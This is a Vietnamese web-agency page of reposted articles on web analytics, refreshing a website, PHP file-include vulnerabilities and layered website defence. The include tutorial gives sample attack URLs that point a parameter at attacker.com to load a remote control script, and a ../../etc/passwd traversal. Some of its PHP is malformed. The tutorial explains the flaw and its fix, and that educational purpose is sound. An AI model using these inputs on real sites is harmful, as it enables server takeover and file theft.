http://www.opentracker.net) được cung cấp ở mức phí, 16,95 USD/tháng, nhưng lại tích hợp rất nhiều tính năng. Dữ liệu thu thập được cho phép bạn tối ưu các trang web để tăng vị trí trong các kết quả tìm kiếm, cải thiện sơ đồ điều hướng và cấu trúc thông tin của website.

Ví dụ, bạn có thể phát hiện ra rằng người truy nhập chỉ vào một khu vực cụ thể trên website rồi truy xuất. Với các công cụ theo dõi web, bạn sẽ nắm bắt được nguyên nhân chung nhất của tình trạng này để đưa ra các biện pháp khắc phục.

Nếu thực sự muốn thành công hơn nữa trên mạng Internet, bạn nên nghiêm túc với những giải pháp đã được đề cập tới ở trên. Trong mọi trường hợp, viện tới tư vấn của các nhà cung cấp dịch vụ ứng dụng (Application Service Provider- ASP) như
http://www.webtrends.com. Các công ty thứ ba này sẽ làm công việc theo dõi, phân tích website cho bạn; đưa ra những đề xuất cụ thể với những thông tin thu thập được. Đương nhiên, ngay cả khi bạn chỉ dụng một bộ đếm hit đơn giản hoặc cả một hệ thống theo dõi và phân tích website (tính phí), hiệu quả hay không vẫn tuỳ thuộc vào mức độ chủ động của bạn.

(Theo Tạp chí BCVT & CNTT - VDC)

 

Làm mới website

By Công Ty Truyền Thông Số iGO

Chúng ta đang sống trong một thế giới trực tuyến và việc người khác tìm kiếm bằng Google để vào được trang web của bạn một cách thường xuyên là một cách làm góp phần tạo nên sự nổi tiếng của doanh nghiệp của bạn. Do đó, có thể nói nếu công ty nào chưa tạo được một trang web, thì nó đang lạc hậu với thời cuộc. Còn những ai chưa thật sự hài lòng với những gì mình đã tạo trên website thì cũng đã đến lúc bắt đầu làm mới lại khuôn mặt của mình trên mạng.

Dưới đây là những gợi ý hữu ích:

1. Hãy tìm đến một trang web mà bạn ngưỡng mộ hay yêu thích về cách trình bày đặc biệt là sự ấn tượng và tính dễ dàng sử dụng của nó. Hãy xem xét và chỉ ra điều gì khác thường và sáng tạo của trang web đó và tìm hiểu cách vận hành những ứng dụng như thế nào để đến được với một khách hàng như bạn. Từ đó bạn sẽ có chìa khóa để mở hướng đổi mới.

2. Cần nêu rõ ràng những giá trị của bạn. Nếu khả năng viết lách của bạn chưa đủ cao, hãy mướn một nhà quảng cáo thực hiện thay công việc này để truyền bá những thông tin có ích với một giọng điệu phù hợp với văn hóa trong công ty bạn.

3. Dành thời gian để nâng cao tính hiện hành của website. Hãy tra cứu website của mình một cách định kỳ để biết được đâu là nơi có thể cập nhật những câu chuyện hay những mẩu tin mới. Viết blog là một cách hỗ trợ để tạo nên những mẫu nội dung mới một cách thường xuyên và chính điều này sẽ góp phần nâng cao thứ hạng của bạn trong những công cụ tìm kiếm trực tuyến, giúp tăng được đáng kể số lượt cập nhật vào trang web.

4. Hãy ngừng nêu lên những lý do và bắt đầu ngay công việc làm mới website của mình. Nếu bạn không có đủ thời gian, hãy đi thuê một chuyên viên IT để thực hiện công việc này.

5. Nên tìm kiếm một đối tác về các dịch vụ website đáng tin để có thể chia sẻ những kinh nghiệm. Điều này sẽ giúp việc làm mới website hiệu quả hơn, thú vị hơn.

Với tốc độ phát triển website ngày càng mạnh mẽ, (từ phiên bản 2.0 sang 3.0 có lẽ chẳng bao lâu nữa) “website hóa” công việc làm ăn là một cách thông minh để nâng trình độ và tầm vóc của các doanh nghiệp.

Gia Trịnh theo Entrepreneur

 

Đôi khi vào các trang hacker , bạn hay thấy các lỗi bảo mật mà hacker đã dùng những cách thức hết sức đơn giản để lấy username và password vào root của host như ../../../../../ ect/passwd. Đó chính là một phần của lỗi include. Nói một cách tổng quát, lỗi include là một loại lỗi do sự bất cẩn khi lập trình gây ra và lỗi này có thể khắc phục một cách dễ dàng.

Include là gì? Include nghĩa là kết nối, lien kết . Để tránh việc lặp đi lặp lại một đoạn mã nào đó, lập trình viên chỉ cần dùng lệnh include đến một file có chứa mã sẵn . Vì thế, trong một mã nguồn ( tin tức, diễn đàn, âm nhạc…) có chứa rất rất nhiều các lệnh Include. Và trong hàng ngàn dòng lệnh thì sai sót ở những nơi không mấy quan trọng là điều không thể tránh.

Dựa vào hình thức chúng ta có thể phân ra 2 loại: remote file và local.

I. Lỗi remote file

a/ Lỗi khai báo biến:

Vd1: Ta có một file exam1.php như sau:

$mkdir=”/home”;
Include($mkdir/config.php);
[…code exam1.php] ?>

Ta thấy rằng file này không có lỗi. Trước tiên lập trình viên (LTV) khai báo biến $mkdir là “/home”. Sau đó LTV dùng lệnh include với đường dẫn đến file config.php là giá trị đã khai báo ở biến $mkdir.
Vd2: Tôi lại có một file exam2.php như sau:

$mkdir =” “;
Include($mkdir/config.php);
[…code exam2.php] ?>

Đã có lỗi xảy ra. Vì file config.php nằm chung một thư mục với file exam2.php nên không cần khai báo biến $mkdir. Biến $mkdir đã không còn có tác dụng và trở nên vô nghĩa. Tuy nhiên LTV lại quên không xoá đi mà lại để nó tồn tại.

Vd3 Quay lại vd 1

$mkdir = “/home”;
Include($mkdir/config.php);
[…code exam1.php] ?>
Giả sử tôi có file config.php như sau:
$datatype =”mysql”;
$datahost =”localhost”;
$data.user =”admin”;
$data.name =”test”; ?>

File exam1.php đã include đến file config.php. Với lệnh include này thì hai file trên sẽ tương đương với 1 file như sau:

$datatype =”mysql”;
$datahost =”localhost”;
$data.user =”admin”;
$data.name =”test”;
[…code exam1.php] ?>

Ở đây đoạn từ $mkdir=…config.php ; đã được thay bằng nội dung file config.php

Vd4: Quay lại với vd2, exam2.php:

$mkdir =” “;
include($mkdir/config.php);
[…code exam2.php]
?>

File này có lỗi. Biến $mkdir để trống không khai báo. Điều này đã tạo cơ hội cho attacker khai báo dùm.
Nếu attacker dùng địa chỉ như sau: http://victim.com/exam2.php?mkdir=http://attacker.com.
File exam2.php của victim lúc này sẽ như sau:

$mkdir= “http://attacker.com”;
Include (http://attacker.com/config.php);
[…code exam2.php] ?>

Trong trường hợp này thì file config.php đã nghiễm nhiên được coi như là nằm trong host của attacker và nếu nội dung file này là một con remview thì sẽ có vấn đề xảy ra. Như vd3 đã nói với lệnh include này, toàn bộ mã của file chứa remview đã nằm gọn trong file exam2.php. Như vậy là attacker đã dùng remview để điều khiển toàn bộ host của victim.

Tuy nhiên việc này chỉ xảy ra ở máy attacker, còn những người truy cập khác đều không có tác dụng và thực chất file exam2.php trên host victim cũng không hề bị thay đổi.

b/ Lỗi khi dùng hàm isset và hàm if

Vd5 Ta có một file exam5.php như sau:

If (!$mkdir) ($mkdir=”config.php”)
Include($mkdir);
[…code exam5.php]
?>

Nghĩa là nếu biến $mkdir chưa được khai báo thì lấy giá trị mặc định là config.php và include đến giá trị mà biến $mrdir đã khai báo.

Tương tự như vd4 attacker lại khai báo dùm biến $mkdir cho victim và …
Vd6 : Lại một file exam6.php

Isset (!$patch) ($patch=”/home”);
Include($patch);
[…code exam6.php]
?>

Nếu biến $patch chưa được khai báo thì lấy giá trị mặc định là /home
Bây giờ đến lượt các bạn tự tìm hiểu

II. Lỗi local

Chúng ta chỉ xét một trường hợp duy nhất ; exam.php:
$file =” “;
Include (/home/$file);
[…code exam.php]
?>

Vẫn tương tự như sau các ví dụ trước nhưng chỉ khác ở chỗ biến $file đã bị giới hạn nằm trong thư mục home.
Nếu attacker nhập vào:
http://victim.com/exam.php?file=http://attacker.com thì code trên thành như sau :

File =”http://attacker.com”) ;
Include (/home/http://attacker.com);
[…code exam.php]
?>

Lệnh include không còn có ý nghĩa vì đường dẫn sai hoàn toàn. Nhưng attacker vần tận dụng được lỗi này. Bằng cách thêm vào đường dẫn như sau :
http://victim.com/exam.php?file=../../../../../etc/passwd/
Với giá trị nhập vào là ../ attacker đã xhayj ngược ;liên kết đến thư mục password của server host .
Vd: chúng ta có cài thư mục như sau:
Server root/home/victim/public.html/forum/includes/exam.php
Với 5 lần sử dụng ../ đã giúp attacker xâm nhập vào thư mục etc/passwd : nơi chứa pass vào root của server.
Tuỳ mỗi server mà có đường dẫn khác nhau mà dùng số lần ../ khác nhau.

III. Cách khắc phục

Đây là lỗi sinh ra do vô ý hoặc do kém hiểu biết về lập trình. Tuy nhiên việc fix lỗi lại rất dễ dàng, chỉ cần loại bỏ các biến không cần thiết khi dùng lệnh include hoặc phải khai báo biến rõ ràng. Qua lỗi này, chúng ta có thể tự bảo mật cho chính website của bản than và tự tìm kiếm các lỗi khác.

(Theo vip4rum.us)

 

Bảo vệ website

By Công Ty Truyền Thông Số iGO

Hacker tấn công vào các website của các tổ chức, đặc biệt là các doanh nghiệp thương mại điện tử chủ yếu để khai thác lỗ hổng nhằm kiểm soát website hoặc tấn công tên miền nhằm chuyển hướng người duyệt web sang một website khác.

Nguy cơ từ các lỗ hổng

Các trang tin thông tin điện tử giờ đây không chỉ đơn thuần là một website thông tin, quảng bá thông thường mà chúng đã và đang chuyển thành các ứng dụng chạy trên nền web. Các ứng dụng web này được xây dựng trên nhiều thành phần và chạy trên các máy chủ khác nhau: máy chủ web, máy chủ ứng dụng và máy chủ cơ sở dữ liệu,...

Cần đầu tư đồng bộ giữa hạ tầng thông tin và hệ thống bảo vệ. Nếu hệ thống vẫn tồn tại những nguy cơ chưa được bảo vệ thì có thể đó sẽ là điểm yếu để tin tặc, thậm chí những đối thủ cạnh tranh lợi dụng để tấn công.

Hacker khi tấn công vào một website có thể nhằm vào một trong các mục đích thay đổi diện mạo trang chủ, thay đổi một phần hoặc toàn bộ website hay tấn công từ chối dịch vụ làm cho website không còn khả năng phục vụ. Các cuộc tấn công này gây nhiều tổn thất cho doanh nghiệp do uy tín có thể bị suy giảm, thông tin trong giao dịch trực tuyến hoặc giao dịch ngân hàng sai lệch, thông tin nhạy cảm như: tài khoản, thẻ tín dụng, thông tin truy nhập vào hệ thống... trong quá trình thực hiện các giao dịch trực tuyến bị đánh cắp

Thời gian gần đây, số vụ tấn công đánh cắp thông tin đang có chiều hướng gia tăng và phòng cảnh sát phòng chống tội phạm công nghệ cao (C15, Bộ Công an) đã phát hiện và khởi tố một số vụ.

Điểm yếu của website ngày nay rất đa dạng. Trung bình mỗi tuần có hơn 30 bản vá cho các lỗ hổng bảo mật được phát hành thì có tới 75% các điểm yếu tập trung vào lỗi phát triển các ứng dụng web. Một trong số các nguyên nhân dẫn đến số lỗi bảo mật trên ứng dụng web là do các website được thuê gia công thường sử dụng chung mã nguồn hoặc tận dụng các mã nguồn miễn phí trên Internet mà không được chỉnh sửa một cách đúng mức, trong khi các lỗ hổng trong các mã nguồn miễn phí này cũng được công bố trên Internet khiến cho nguy cơ bị tấn công càng cao hơn.

Ba lớp bảo vệ website


1. Vành đai bảo vệ chung cho toàn hệ thống mạng (lớp 1), gồm cả hệ thống web.

Để triển khai lớp bảo vệ đầu tiên này, các tổ chức, doanh nghiệp có thể trang bị một thiết bị an ninh tích hợp (UTM) gồm nhiều tính năng bảo mật khác nhau như:

• Tường lửa (Firewall) sẽ giúp ngăn chặn các tấn công tầng mạng, loại bỏ các hành vi dò quét các điểm yếu bảo mật của các hệ điều hành trên các máy chủ

• Thành phần ngăn chặn xâm nhập (IPS) giúp loại bỏ các tấn công khai thác các điểm yếu của phần mềm ứng dụng web, phần mềm cơ sở dữ liệu, hệ điều hành... Ngoài ra các thành phần mạng riêng ảo (VPN) và thành phần quét virus mức gateway sẽ giúp hệ thống được an toàn hơn.

2. Tường lửa chuyên dụng cho các ứng dụng web

Sau khi xây dựng vành đai bảo vệ chung, cần trang bị thêm một tường lửa chuyên dụng cho các ứng dụng web (lớp 2). Tường lửa ứng dụng web này sẽ kiểm tra và ngăn chặn các tấn công khai thác điểm yếu phát sinh trong quá trình phát triển website. Tùy thuộc vào quy mô của tổ chức, doanh nghiệp và/hoặc phụ thuộc vào giá trị của tài nguyên thông tin trên website mà có thể có một mức đầu tư tương ứng cho tường lửa ứng dụng web này. Có 3 lựa chọn:

• Đối với các website mà phần lớn là thông tin tĩnh (ít thay đổi), không chứa các dữ liệu quan trọng cũng như không có các giao dịch mua bán: có thể trang bị bổ sung module phần mềm tường lửa cho ứng dụng web (như Web Intelligence của Check Point) vào thiết bị an ninh tích hợp UTM nói trên.

• Đối với các website có rất nhiều dữ liệu quan trọng mang tính chất sống còn của tổ chức, doanh nghiệp, đồng thời thường xuyên diễn ra các giao dịch trực tuyến, đòi hỏi phải có độ an toàn, sẵn sàng cao: nên trang bị một thiết bị tường lửa chuyên dụng cho ứng dụng web (như giải pháp của NetContinuum, một hãng chuyên cung cấp thiết bị tường lửa chuyên dụng cho ứng dụng web).

• Đối với các website cung cấp các thông tin nội bộ hoặc cổng truy nhập thông tin của một tổ chức, doanh nghiệp (Web Portal) cho phép nhân viên kết nối vào từ bất cứ đâu và làm việc bất kể thời gian nào: ngoài việc trang bị lớp bảo vệ chung bằng thiết bị an ninh tích hợp, các tổ chức, doanh nghiệp cũng cần xây dựng một “cổng truy nhập” an toàn đến các tài nguyên thông tin (ví dụ sử dụng thiết bị Connectra Web Security Gateway của Check Point).

Song song tường lửa chuyên biệt cho các ứng dụng web, các tổ chức, doanh nghiệp cũng cần trang bị các giải pháp xác thực mạnh cho ứng dụng web quan trọng. Một giải pháp xác thực mạnh phải xác thực 2 yếu tố trở lên. Thông thường, các giải pháp xác thực mạnh truyền thống sẽ đòi hỏi hàng trăm đô-la đầu tư cho mỗi một người dùng, như vậy sẽ rất tốn kém trong việc đầu tư. Hiện nay, giải pháp xác thực mạnh IdentityGuard của Entrust sẽ giúp các tổ chức, doanh nghiệp giải quyết bài toán này với một chi phí tối ưu.

Những việc cần phải thực hiện sau khi website bị tấn công:
• Tách hệ thống bị tấn công khỏi mạng, đề phòng hacker vẫn tiếp tục phá hoại trong quá trình khắc phục.
• Phân tích các log trên hệ thống để tìm hiểu cách thức khai thác của hacker nhằm đưa ra biện pháp phòng chống thích hợp.
• Cấu hình lại hệ thống mạng và máy chủ chặt chẽ.
• Kiểm tra lại mã nguồn website để vá các lỗ hổng do lập trình.
• Rà soát máy chủ, đề phòng tin tặc đã cài được webshell (1 dạng backdoor). Nếu không sớm phát hiện ra webshell, hệ thống máy chủ rất dễ bị tấn công trở lại cho dù đã khắc phục được lỗ hổng.

3. Thiết bị an ninh tích hợp hoặc thiết bị chống xâm nhập mạng

Sau khi đầu tư hai lớp bảo vệ trên, để tăng cường an toàn bảo mật thông tin, tổ chức, doanh nghiệp có thể bổ sung thêm một thiết bị an ninh tích hợp hoặc thiết bị chống xâm nhập mạng (IPS) chuyên dụng (lớp 3). Lớp này phân chia mạng bên trong thành các phân vùng khác nhau và áp dụng các chính sách riêng cho từng phân vùng mạng nhằm ngăn chặn các tấn công có nguồn gốc từ bên trong mạng và loại bỏ các tấn công có thể vượt qua tường lửa vào vùng các máy chủ quan trọng.

Thay lời kết

Việc đầu tư và triển khai một hệ thống bảo vệ cho ứng dụng web là rất cần thiết, tuy nhiên cần phải đầu tư một cách đồng bộ giữa hạ tầng thông tin và hệ thống bảo vệ. Nếu hệ thống vẫn còn tồn tại những nguy cơ chưa được bảo vệ thì có thể đó sẽ là các điểm yếu để tin tặc, thậm chí những đối thủ cạnh tranh lợi dụng để tấn công, và hậu quả khó có thể lường trước được. Song song với việc đầu tư về công nghệ, các tổ chức, doanh nghiệp cũng cần xây dựng riêng cho mình một chính sách an toàn thông tin và một đội ngũ quản trị có kinh nghiệm để duy trì và vận hành hệ thống.

(Theo iGuru)

 

Công Ty Truyền Thông Số iGO

Thiết Kế Website

Quảng Bá Website

Thương Mại Điện Tử

Câu Chuyện Doanh Nhân

Thị Trường Chứng Khoán

Khách Thăm Trong Ngày